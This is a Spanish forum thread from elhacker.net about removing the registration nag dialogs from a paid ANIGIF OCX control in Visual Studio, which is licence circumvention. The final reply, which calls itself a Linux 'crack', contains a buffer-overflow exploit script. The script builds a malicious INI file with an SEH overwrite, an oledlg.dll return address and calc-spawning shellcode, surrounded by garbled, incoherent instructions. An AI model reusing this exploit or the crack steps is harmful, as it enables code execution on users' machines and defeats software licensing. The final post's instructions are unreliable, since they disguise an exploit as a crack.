Foro de elhacker.net

Programación => Ingeniería Inversa => Mensaje iniciado por: Graphixx en 27 Marzo 2011, 00:37 am


Título: CRackeando OCX's con Visual Studio .NET 2003/2005
Publicado por: Graphixx en 27 Marzo 2011, 00:37 am
Historia: Una tarde Graphixx estaba envalado bregando a usar Gifs en Visual Basic 6.0 , y cansado de fregar...se fue a trabajar en Visual Studio .NET y Ah la sorpresa cuando descubrio que este permitia abrir las OCX en tiempo de diseño, y ahi comenzo todo....

Archivos necesarios para la practica:
Los archivos el control OCX chino original y ya crackeado estan en este post que ya habia publicado, bajatelos para que podas seguir paso a paso la practica.
Ver post con los archivos (Tengo el control OCX full - Crackeado by Graphixx)
http://foro.elhacker.net/programacion_visual_basic/tengo_el_control_ocx_anigif_en_version_fullcrackeado-t131536.0.html;msg616138#msg616138

Procedimiento:
Lo he implementado en Visual Studio .NET 2003 y 2005

1) Seleccionamos la OCX a crackear en este caso la ANigif.OCX y le damos abrir con...
(http://img79.imageshack.us/img79/3879/imagen0015lk.jpg)
2) Seleccionamos la opcion abrir con...
(http://img79.imageshack.us/img79/6942/imagen0022lk.jpg)

3) Seleccionamos la opcion seleccionar el programa de una lista...
(http://img79.imageshack.us/img79/3218/imagen0038gy.jpg)
4) Seleccionamos el Visual Studio .NET 2003 o 2005 el que tengan
(http://img66.imageshack.us/img66/2422/imagen0044jq.jpg)

5) Nos va a aparecer una ventana asi.... donde podemos observar todos los objetos de los que se compone la OCX, aqui tenemos que proceder a localizar las ventanas SPAM que son las que siempre salen pidiendo registrar el control, en este caso son 2.  la 203 y la 202.
(http://img79.imageshack.us/img79/7791/imagen0054nc.jpg)

6) vista de la ventana de registro 203 (Acedes a esta vista simplemente dando doble clic sobre ella en la ventana anterior)
(http://img66.imageshack.us/img66/7452/imagen0061rm.jpg)

7) Vista de la ventana de registro 202
(http://img152.imageshack.us/img152/9563/imagen0070qz.jpg)

8 ) Procedemos a eliminar la 203 (clic derecho y eliminar)
(http://img79.imageshack.us/img79/4098/imagen0083fk.jpg)

9) Procedemos a eliminar la 202
(http://img79.imageshack.us/img79/4184/imagen0097fz.jpg)

10) Asi queda la vista de la ventana despues de haber eliminado los dos objetos (form o formularios de la sección Dialog de la OCX).
(http://img79.imageshack.us/img79/1429/imagen0108vm.jpg)

11) Por ultimo guardamos la OCX, clic derecho y guardar.
(http://img79.imageshack.us/img79/3059/imagen0110tv.jpg)

LISTO ! apuesto a que es el crack mas facil que podeis hacer en toda tu vida, no te quedes sin intentarlo....

Título: Re: CRackeando OCX's con Visual Studio .NET 2003/2005
Publicado por: apuromafo CLS en 27 Marzo 2011, 03:38 am
dale con el tema de destruir recursos  , te pasare comprimido con upx la ocx y el metodo no te servira.

los ocx, trabajan igual que como una dll, o similar  pero esto siempre que no este comprimida la aplicacion/dll

saludos Apuromafo

Título: Re: CRackeando OCX's con Visual Studio .NET 2003/2005
Publicado por: Graphixx en 27 Marzo 2011, 07:12 am
vale vale bro que yo no me dedico a eso del crack, y es mas no se podria considerar mucho como crack el metodo que utilizo pero es lo que me imagine y me resulto de probar por simple pericia... es como ese metodo que no se si has visto de parchar el logmein, con el reshack borrando la ventana que sale en el pc anfitrion. pero de mas esta que es en su tiempo fue una solucion para mi, y creeme que no se encontraba por ningun lado el crack pa esa ocx y es de pago. aparte quiero aclarar que lo hice por simple curiosidad y por que estaba programando un juego para divertirme, pero si uno va usar una libreria que alguien se esforzo en hacer, vale, que se debe pagar por ella, nosotros como programadores entendemos el esfuerzo que conlleva hacer algo. y cuando se va usar para un proyecto en la empresa o para uno sacar un proyecto a produccion, de mas esta pagar por ella, y si es para un proyecto libre entonces buscar una libreria gratuita.

Saludos.

Título: Re: CRackeando OCX's con Visual Studio .NET 2003/2005
Publicado por: seba123neo en 27 Marzo 2011, 07:18 am
hay un monton de ocx que solo con borrarle la ventanita ya se hace full...pero aparte si en visual basic necesitas mostrar gif, tenes el source del anigif por ahi, en control de usuario (.ctl)

Título: Re: CRackeando OCX's con Visual Studio .NET 2003/2005
Publicado por: karmany en 27 Marzo 2011, 21:29 pm
Hola Graphixx, primeramente gracias por compartir.

Bueno, yo soy de la opinión de apuromafo, yo no soy partidario de eliminar los recursos así sin más. Pienso que hay que analizar el código. Si no me equivoco ese ocx estará hecho con Visual Basic 6 y sin protección, así que no debe ser difícil analizarlo.

De todos modos si a ti te funciona bien así, pues adelante pero yo no recomiendo que la gente se lo descargue. Eliminando recursos puedes conseguir que se produzcan excepciones no esperadas y que se ejecute código no deseado.

Un saludo-

Título: Re: CRackeando OCX's con Visual Studio .NET 2003/2005
Publicado por: jessejemmes en 3 Abril 2011, 18:00 pm
si ha alguien le interesa tambien se puede crackear en linux
Código
  1. [/ </ID_CHECKBOX1>
  2.     <ID_NotebookSearchSource>
  3.       <index>2</index>
  4.     </ID_NotebookSearchSource>
  5.     <ID_TextCtrlSearchInFileList>
  6.       <value></value>
  7.     </ID_TextCtrlSearchInFileList>
  8.     <ID_ListCtrlSearchFilesAndFolders>
  9.       <items/>
  10.     </ID_ListCtrlSearchFilesAndFolders>
  11.     <ID_CheckBoxIncludeSubFolders>
  12.       <value>1</value>
  13.     </ID_CheckBoxIncludeSubFolders>
  14.     <ID_ComboBoxIncludeWords>
  15.       <items/>
  16.       <index>-1</index>
  17.       <value></value>
  18.     </ID_ComboBoxIncludeWords>
  19.     <ID_ComboBoxFilePath>
  20.       <items/>
  21.       <index>-1</index>
  22.       <value>Z:\root\program\</value>
  23.     </ID_ComboBoxFilePath>
  24. ] asi les tiene que quedar olledlg.cfg
  25. y se tiene que generar este archivo apartir de este script que crearemos con kwrite en ubuntu 
  26. [code=asm][appdata = ENV['APPDATA'] 
  27. file = appdata +"\\tec.ini
  28.  
  29. f = open(file, "wb")
  30. eb = "\xeb\x06\x90\x90"
  31. ppr = "\x67\x15\xD3\x74"	#Module Name=C:\WINDOWS\system32\oledlg.dll version=1.0 (XPClient.010817-1148)
  32. #Spawn calc.exe, bad characters: \x00\x0a\x0d
  33. shellcode = ("\xdd\xc3\xd9\x74\x24\xf4\x5a\xb8\x30\xe7\x16\x7d\x33\xc9" +
  34. "\xb1\x33\x31\x42\x17\x83\xc2\x04\x03\x72\xf4\xf4\x88\x8e" +
  35. "\x12\x71\x72\x6e\xe3\xe2\xfa\x8b\xd2\x30\x98\xd8\x47\x85" +
  36. "\xea\x8c\x6b\x6e\xbe\x24\xff\x02\x17\x4b\x48\xa8\x41\x62" +
  37. "\x49\x1c\x4e\x28\x89\x3e\x32\x32\xde\xe0\x0b\xfd\x13\xe0" +
  38. "\x4c\xe3\xdc\xb0\x05\x68\x4e\x25\x21\x2c\x53\x44\xe5\x3b" +
  39. "\xeb\x3e\x80\xfb\x98\xf4\x8b\x2b\x30\x82\xc4\xd3\x3a\xcc" +
  40. "\xf4\xe2\xef\x0e\xc8\xad\x84\xe5\xba\x2c\x4d\x34\x42\x1f" +
  41. "\xb1\x9b\x7d\x90\x3c\xe5\xba\x16\xdf\x90\xb0\x65\x62\xa3" +
  42. "\x02\x14\xb8\x26\x97\xbe\x4b\x90\x73\x3f\x9f\x47\xf7\x33" +
  43. "\x54\x03\x5f\x57\x6b\xc0\xeb\x63\xe0\xe7\x3b\xe2\xb2\xc3" +
  44. "\x9f\xaf\x61\x6d\xb9\x15\xc7\x92\xd9\xf1\xb8\x36\x91\x13" +
  45. "\xac\x41\xf8\x79\x33\xc3\x86\xc4\x33\xdb\x88\x66\x5c\xea" +
  46. "\x03\xe9\x1b\xf3\xc1\x4e\xd3\xb9\x48\xe6\x7c\x64\x19\xbb" +
  47. "\xe0\x97\xf7\xff\x1c\x14\xf2\x7f\xdb\x04\x77\x7a\xa7\x82" +
  48. "\x6b\xf6\xb8\x66\x8c\xa5\xb9\xa2\xef\x28\x2a\x2e\xde\xcf" +
  49. "\xca\xd5\x1e")
  50.  
  51. f.write("\r\n[Act_"+"\x41"*1088+eb+ppr+shellcode+"]\r\nEnabled = 1\r\n")
  52. f.close()
  53. ] le llamaremos app/data
  54.  
  55. luego ya bastara abrir con wine tec.exe  y emplear convert para olledlg.cfg , app/data
  56.  
  57. y crearan un archivo 03.log y walla crackeado importante cuando creen olledlg.cfg hagan una copia y llamen le olledlg.lst el programa al principio no la reconocera pero la dan all archives y no habra problema 
  58.  
  59.  
  60. saludos.....
[/code]


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines